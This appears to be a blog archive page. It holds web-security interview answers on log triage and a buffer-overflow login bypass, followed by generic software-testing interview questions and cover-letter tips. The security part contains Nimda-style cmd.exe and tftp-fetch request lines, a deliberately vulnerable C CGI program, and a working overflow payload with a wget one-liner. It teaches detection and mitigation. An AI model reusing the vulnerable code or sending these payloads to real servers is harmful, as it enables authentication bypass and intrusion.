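The CLF triage that questions 1 and 4 ask for can be scripted. The following added example (mine, not from the original page) parses Common Log Format lines, flags directory traversal and cmd.exe/root.exe probes of the Nimda type as well as PUT uploads, and records whether the server answered with a 2xx, which is the detail that decides whether the origin server behind the proxy needs a closer look. The log lines are constructed to resemble the traffic in questions 1 and 4; the traversal encodings listed are a subset of the variants the worm sent.

```python
import re
from urllib.parse import unquote

# Common Log Format, optionally followed by the two quoted fields of the
# Combined format. Which quoted field is the referer and which the User-Agent
# depends on the server's LogFormat, so they are captured generically.
CLF_RE = re.compile(
    r'^(?P<client>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<quoted1>[^"]*)" "(?P<quoted2>[^"]*)")?$')

# ".." followed by a separator in plain, URL-encoded, overlong-UTF-8 and
# double-encoded forms (a subset of the variants Nimda and Code Red II used).
TRAVERSAL_RE = re.compile(
    r'\.\.(?:/|\\|%2f|%5c|%c0%af|%c1%1c|%c1%9c|%c0%9v|%255c|%252f)', re.I)
# Executables the worm probes for, plus the second-stage tftp fetch.
NIMDA_RE = re.compile(r'/(?:cmd|root)\.exe|\btftp\b', re.I)

def parse_clf(line):
    """Parse one access-log line into a dict, or None if it is not CLF."""
    m = CLF_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def classify(rec):
    """Tag a parsed record; an empty list means nothing suspicious."""
    tags = []
    if rec["method"] == "PUT":
        tags.append("put-upload")
    if TRAVERSAL_RE.search(rec["path"]):
        tags.append("traversal")
    if NIMDA_RE.search(unquote(rec["path"])):
        tags.append("nimda-probe")
    return tags

def triage(log_text):
    """Return the flagged requests and whether the server answered 2xx.
    A 2xx to a Nimda probe means the worm will send its second stage and the
    origin server must be checked; a 2xx to a PUT means the upload landed."""
    report = []
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            report.append({"client": rec["client"], "method": rec["method"],
                           "path": rec["path"], "status": rec["status"],
                           "tags": tags,
                           "succeeded": 200 <= rec["status"] < 300})
    return report

# Constructed sample lines modelled on the traffic in questions 1 and 4.
SAMPLE_LOG = r'''
68.48.142.117 - - [18/Sep/2001:13:02:17 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1234
68.48.142.117 - - [18/Sep/2001:13:02:18 -0400] "GET /scripts/root.exe?/c+tftp%20-i%2068.48.142.117%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 1234
201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0" 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"
10.0.0.5 - - [26/Dec/2004:02:00:00 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(r["client"], r["method"], r["status"], ",".join(r["tags"]),
              "SUCCEEDED, check origin server" if r["succeeded"] else "refused")
```

The succeeded flag is what matters for the proxy scenario in question 1: a traversal probe that a reverse proxy answered with 200 was forwarded to something that served it, so the server behind the proxy is where the inspection has to happen.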

 

 

5. You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this –

"GET /cgi-bin/logon_validate?login=test&password=test"

The source code is shown below. The original pseudo-code left the query-string lookup and the expected credentials as placeholders; here they are filled in with getenv("QUERY_STRING"), which is how a CGI program receives the query string, and two stand-in #defines, so that the script compiles. The unchecked strcpy() calls are kept exactly as in the original, since they are the point of the exercise –

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-ins for the credentials the real script compares against. */
#define GOOD_USER "admin"
#define GOOD_PASS "secret"

void show_error(void) {
    // AUTHENTICATION ERROR
    exit(-1);
}

int main(int argc, char **argv) {
    char error_on_auth = '1';   /* '1' = not authenticated; declared just before user[] */
    char user[128];
    char pass[128];
    char *ch_ptr_begin;
    char *ch_ptr_end;
    char *query = getenv("QUERY_STRING");   /* CGI: the query string arrives in the environment */

    if (query == NULL)
        show_error();

    /**********************************/
    /* Get Username from Query String */
    /**********************************/
    ch_ptr_begin = strstr(query, "login=");
    if (ch_ptr_begin == NULL)
        show_error();
    ch_ptr_begin += 6;
    ch_ptr_end = strstr(ch_ptr_begin, "&");
    if (ch_ptr_end == NULL)
        show_error();
    *(ch_ptr_end++) = '\0';
    strcpy(user, ch_ptr_begin);          /* no length check: a long value runs past user[128] */

    /**********************************/
    /* Get Password from Query String */
    /**********************************/
    ch_ptr_begin = strstr(ch_ptr_end, "password=");
    if (ch_ptr_begin == NULL)
        show_error();
    ch_ptr_begin += 9;
    ch_ptr_end = strstr(ch_ptr_begin, "&");
    if (ch_ptr_end != NULL) *(ch_ptr_end++) = '\0';
    strcpy(pass, ch_ptr_begin);          /* same problem for pass[128] */

    if ((strcmp(user, GOOD_USER) == 0) && (strcmp(pass, GOOD_PASS) == 0)) error_on_auth = '0';

    if (error_on_auth == '0') {
        // AUTHENTICATION OK!!
    } else {
        // AUTHENTICATION ERROR
        show_error();
    }

    // return(0); hehe could be evil ;PPPPP
    exit(0);
}

This pseudo-code is taken from the NGSec Web Auth Games http://quiz.ngsec.biz:8080/game1/level6/replicant.php

Do you see any problems with this script? How could an attacker exploit this script to bypass the authentication mechanisms in this script? What are some mitigation options?

 

Goal of question – This is most likely the most complex question asked during the interview, because the applicant needs to apply multiple layers of analysis, from both the attacker's and the defender's perspective.

Reference "Smashing The Stack For Fun And Profit" for technical details –

http://www.phrack.org/phrack/49/P49-14

The security issue with this script is a stack buffer overflow, caused by the unchecked strcpy() calls, combined with the way the script uses the error_on_auth flag. error_on_auth is initially set to '1', meaning the user is not authenticated, and is only changed to '0' after a correct username and password. The user buffer is declared directly after error_on_auth and holds 128 bytes. If the compiler lays the locals out in declaration order (common, but not something the C language guarantees), the two occupy adjacent locations on the stack, so a username of 129 bytes whose last byte is the character '0' is copied past the end of user and overwrites error_on_auth with '0'. The strcmp() checks then fail, but the script only tests error_on_auth, so it falls into the AUTHENTICATION OK branch. Two details matter in practice: the request must still contain an "&" after the login value, because the script errors out if it finds none, and a much longer username would also overwrite the saved return address, the classic case described in the Phrack article. A request such as the following would achieve this goal –

 

http://www.companyx.com/cgi-bin/logon_validate?login=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000&password=x

(the login value is 129 zeros), or, from a shell:

# wget "http://www.companyx.com/cgi-bin/logon_validate?login=$(perl -e 'print "0" x 129')&password=x"

 

Mitigation options include the following:

• Fix the logon_validate source code: check the length of each value before copying it and reject (or truncate, with an explicit terminating NUL) anything that will not fit in the 128-byte buffers. Simply swapping strcpy() for strncpy() is not enough on its own, because strncpy() does not NUL-terminate a value that fills the buffer; strncpy(user, ch_ptr_begin, sizeof(user) - 1) followed by user[sizeof(user) - 1] = '\0', or snprintf(), is the safe form. The success path should also depend directly on the comparison result rather than on a flag that sits in overwritable stack memory.
• If the source code cannot be updated, then security filters would need to be implemented on the web server.
• Using Mod_Security, you could implement security filters for the "logon_validate" URL such as these:
  • Only allow letters in the username argument. This prevents the client from overwriting the error_on_auth data with a zero. The pattern has to be anchored at both ends: ^[a-zA-Z] on its own only checks the first character, so a username of 128 letters followed by a single 0 would pass it.

<Location /cgi-bin/logon_validate>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]+$"
</Location>

  • You could also add another rule to reject username/password arguments of 129 characters or more. This addresses the overflow itself rather than one particular payload, and it protects the pass buffer as well.

<Location /cgi-bin/logon_validate>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]+$"
SecFilterSelective ARG_LOGIN|ARG_PASSWORD ".{129,}"
</Location>

A web application firewall (WAF) device could be deployed on the network to protect the entire web site. These devices offer a positive security model, in which only requests that match the learned or configured profile of the application are allowed, so requests like these should be identified as anomalous and denied. A brief listing of WAF vendors includes Teros, NetContinuum, Imperva, Watchfire, Breach, Axiliance and others.
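Because SecFilterSelective rules are just regular expressions applied to the decoded argument, their exact anchoring decides what gets through. The following added example (not part of the original page, and not Mod_Security's own code) emulates the deny logic of the two filters above in Python: a leading "!" means deny when the pattern does not match, otherwise deny when it matches. It shows that ^[a-zA-Z] alone inspects only the first character, so a username of 128 letters followed by a single 0 gets past it and would still overwrite error_on_auth, while the fully anchored ^[a-zA-Z]+$ and the .{129,} length rule both catch it. The request strings are constructed.

```python
import re
from urllib.parse import unquote_plus

# Each rule: (argument names it inspects, pattern). A leading "!" negates the
# match, mirroring SecFilterSelective in Mod_Security 1.x.
FILTERS_AS_PUBLISHED = [
    (("login",), "!^[a-zA-Z]"),                # only checks the first character
    (("login", "password"), ".{129,}"),        # 129 or more characters
]
FILTERS_FIXED = [
    (("login",), "!^[a-zA-Z]+$"),              # every character must be a letter
    (("login", "password"), ".{129,}"),
]

def parse_query(query):
    """Decode a query string into a dict, as the WAF sees the arguments."""
    args = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        args[unquote_plus(name)] = unquote_plus(value)
    return args

def denied_by(filters, query):
    """Return the first rule that denies the request, or None if it passes."""
    args = parse_query(query)
    for names, pattern in filters:
        negate = pattern.startswith("!")
        regex = re.compile(pattern[1:] if negate else pattern)
        for name in names:
            if name not in args:
                continue
            matched = regex.search(args[name]) is not None
            # positive rule denies on match; negated rule denies on no match
            if matched != negate:
                return names, pattern
    return None

if __name__ == "__main__":
    overflow = "login=" + "0" * 129 + "&password=x"        # payload from the answer above
    sneaky = "login=" + "a" * 128 + "0" + "&password=x"    # letter prefix, same overwrite
    for label, req in (("overflow", overflow), ("sneaky", sneaky)):
        print(label, "first rule as published:", denied_by([FILTERS_AS_PUBLISHED[0]], req))
        print(label, "first rule fixed:       ", denied_by([FILTERS_FIXED[0]], req))
```

The length rule is the one to keep even if the character class is later relaxed, since any 129-byte value, letters or not, still lands on error_on_auth, and a longer one reaches the saved return address.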

 

 

 

Software Testing general Interview Questions

April 10, 2008 1 comment

Q1. What is the difference between an error, a bug, a defect, a fault and a failure?

Error: A deviation from the requirement, caught by testers and caused by a misunderstanding on the developers' side. In other words, a coding problem, or a problem caused by wrong coding practice.

Bug: An error found by testers that the developers have accepted as an error is then called a bug. It may be functional or load related.

Defect: Suppose a product is currently running as a beta version on the market or at the client's site. Any issue caught in that application that makes the actual result deviate from the requirement is taken as a defect.

Fault: When the product has been successfully launched on the market and is running properly, but for some reason works unexpectedly, that is called a fault.

Failure: If the product fails to fulfil the requirement, that is called a failure.

Q2. What are validation and verification?

Verification: Conducting reviews on documents such as the BRS, SRS, HLDs and LLDs, to check that the product is being built the right way.

Validation: Better known as testing: executing the test cases and observing whether the actual result equals the expected result. It covers unit testing, sub-system integration testing, system integration testing and system testing; black-box techniques are used in validation.

Q3. Explain the software test life cycle.

The STLC basically consists of five stages: 1) Planning and control 2) Analysis and design 3) Implementation and execution 4) Evaluating exit criteria and reporting 5) Test closure.

In other words, you can also say: requirement gathering, test planning, test design, bug reporting, regression testing and closure. Be ready to explain each step briefly.

Q4. Explain the bug life cycle.

New, open, assigned, fixed, reopened and closed.

New: when the tester raises the bug, its status is New.
Open: if the bug is genuine, the lead changes the status to Open.
Assigned: the bug is assigned to a developer.
Fixed: the developer fixes the bug and changes the status to Fixed.
Reopened: after retesting or regression testing, the tester decides whether the bug is closed or reopened.
Closed: fixed by the developer, reviewed by the tester and closed.

Q5. What are software testing methodologies?

These are some of the commonly used methodologies:
1. Waterfall model
2. V model
3. Spiral model
4. Rational Unified Process (RUP)
5. Agile model
6. Rapid Application Development (RAD)

Explain whichever one your current company follows.

Q6. What is a traceability matrix?

A traceability matrix is a document in which we map the test cases to the requirements. With it we check whether the application works as per the requirements, and whether all the required functionality has been covered by test cases.

Q7. What is performance testing?

Performance testing is performed to ascertain how the components of a system perform under a given situation. Resource usage, scalability and reliability of the product are also validated in this testing. It is a subset of performance engineering, which focuses on addressing performance issues in the design and architecture of a software product.

Q8. What kinds of testing are performed in mobile application testing?

Functional testing – Ignores the internal parts and focuses on whether the output is as per the requirement or not; black-box testing geared to the functional requirements of an application.

System testing – The entire system is tested against the requirements; black-box testing based on the overall requirements specification that covers all the combined parts of a system.

Incremental integration testing – A bottom-up approach, i.e. continuous testing of an application as new functionality is added; application functionality and modules should be independent enough to be tested separately. Done by programmers or by testers.

End-to-end testing – Similar to system testing; involves testing a complete application environment in a situation that mimics real-world use, such as interacting with a database, using network communications, or interacting with other hardware, applications or systems where appropriate.

Acceptance testing – Normally done to verify that the system meets the customer-specified requirements. The user or customer does this testing to decide whether to accept the application.

Usability testing – A user-friendliness check. The application flow is tested: can a new user understand the application easily, and is proper help available wherever the user gets stuck? Basically the system navigation is checked in this testing.

Install/uninstall testing – Full, partial and upgrade install/uninstall processes are tested on different operating systems under different hardware and software environments.

Compatibility testing – Testing how well the software performs in a particular hardware/software/operating system/network environment, and in different combinations of the above.

Recovery testing – Testing how well a system recovers from crashes, hardware failures or other catastrophic problems.

What is a test plan?

A test plan can be defined as a document describing the scope, approach, resources and schedule of intended testing activities.

It identifies test items, the features to be tested, the testing tasks, who will do each task, and any risks requiring contingency planning.

In other words, a test plan is the strategic document for the testing effort. It consists of the test plan ID, reference documents, revision history, test schedules, test items, test process, resources, risks and mitigations, training and similar information.

What is a test case?

Test cases are the implementation of a test case design that helps the software tester detect defects in the application or system under test; that should be the primary goal of any test case or set of test cases. When I write a test case, I think of both types of test cases, positive and negative. Positive test cases are those which execute the happy path in the application and make sure that the happy path is working fine. Negative test cases, as the name suggests, are destructive test cases which are documented with some out-of-the-box thinking to break the system.

In other words, a test case is a document that describes an input, action or event and an expected response, to determine whether a feature of an application is working correctly. A test case should contain particulars such as the test case identifier, test case name, objective, test conditions/setup, input data requirements, steps and expected results.

What is end-to-end testing?

Testing a complete application environment in a situation that mimics real-world use, such as interacting with a database, using network communications, or interacting with other hardware, applications or systems where appropriate.

What is the difference between retesting and regression testing?

Retesting: Re-executing, on the new build, the test cases that failed on the previous build, to confirm that the reported defect has actually been fixed.

Regression testing: Attempts to verify that the application still works as specified after enhancements or bug fixes have been made to it, i.e. that the change has not broken functionality that used to work.

What is test coverage?

Test coverage measures, in some specific way, the amount of testing performed by a set of tests (derived in some other way, e.g. using specification-based techniques). Wherever we can count things and tell whether or not each of those things has been exercised by some test, we can measure coverage.

Questions to answer before selecting a test automation tool:

1. What are our primary objectives for a tool?
2. Describe the organization's development and testing process/methodology.
3. What type(s) of testing are we doing currently?
4. What tools do we currently own/maintain (purchased and home-grown)?
5. What language(s) is our application developed in?
6. Is the application web or browser based? If so, which browsers and versions do we test on?
7. What operating systems do we test on?
8. Are there any third-party controls or grids?
9. Are there any ActiveX controls?
10. Do we need to test server-side COM objects or other parts of our application not accessed through a GUI?
11. Describe the application architecture.
12. What is the communication protocol between the different tiers of the application?
13. What databases does our application work with?
14. How do we create our test data?
15. Are we trying to validate data in the GUI, in the back-end database, or both?
16. How often does our group test new builds of the application?
17. Do we have a dedicated test lab, or would testers be using their own desktops?
18. What amount of money are we budgeting for this project/tool?

 

Why should I hire you?

I think that I am best suited for this job. I am an efficient team player where team work is concerned, and if I am expected to complete a task within a particular time I am able to work individually and effectively to meet the deadline. I can deal with things effectively under pressure. I am also an optimistic, hardworking, self-motivated, detail-oriented and well-organized person. These qualities make me suitable for this job.

How to write a basic cover letter

Basic cover letter

In the first paragraph, mention the source of the job vacancy, introduce yourself to the potential employer, mention how you suit the job profile, and make the employer aware of the attached resume. An employer has to decide, based on just one paragraph, whether you should be called for an interview or not, so you need to be very careful while writing a basic cover letter.

Even though a basic cover letter needs to be short and precise, you should not skip any important details that are essential for an employer to know. If you sacrifice important information for the sake of the format, you might sacrifice your chance of getting an interview call. So always remember: though short, your basic cover letter should be precise and to the point.

Example of a cover letter:

I am interested in the Test Lead position advertised in XXXX. I am currently employed as a senior software test engineer at YYYY Company.

(In the second paragraph, describe some of the roles and responsibilities you hold at your current company.)

To further acquaint you with the specifics of my background, I am enclosing my resume. I hope you will consider me for this position. I look forward to meeting with you and discussing my qualifications in more detail.

Sincerely,